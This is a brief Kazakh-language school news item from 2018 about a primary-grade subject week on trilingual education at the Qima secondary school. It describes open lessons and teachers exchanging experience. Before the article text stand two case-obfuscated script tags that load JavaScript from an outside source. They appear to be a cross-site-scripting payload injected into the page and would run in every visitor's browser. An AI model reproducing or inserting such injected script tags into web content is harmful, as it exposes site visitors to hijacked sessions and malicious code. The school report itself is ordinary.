<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
07.03.2018
«Әрбір адам – туыс, бауыр, жұрағат,
Әрбір сабақ – өнер, білім, ұлағат», демекші, міне тағы да бір оқу жылын артқа тастағалы отырмыз, оқушының жыл бойғы өткен еңбегінің сыналар тұсы жақындаған сияқты. Жас ұрпақ білімді де саналы болса, мемлекетіміздің де іргетасы мықты болады. Бұның негізі бастауыш сыныптар мен бастауыш сынып мұғалімдері. Осыған орай Ғ.Әбдірахманұлы атындағы Қима орта мектебінің бастауыш бірлестігінің жылдық жоспары бойынша жаңартылған бағдарламаның әдіс- тәсілдерін қолдана отырып «Үш тұғырлы тіл-заман талабы» атты тақырып аясында онкүндік апталығы өтіп жатыр. Әр ұстаз өзінің жаңа еңбектерімен, жинақтаған тәжірибелерін ортаға салып, пәндер бойынша ашық сабақтар мен тәрбие сағаттарын өткізіп, әріптестерімен пікір алмасып, ой бөлісіп жүр.



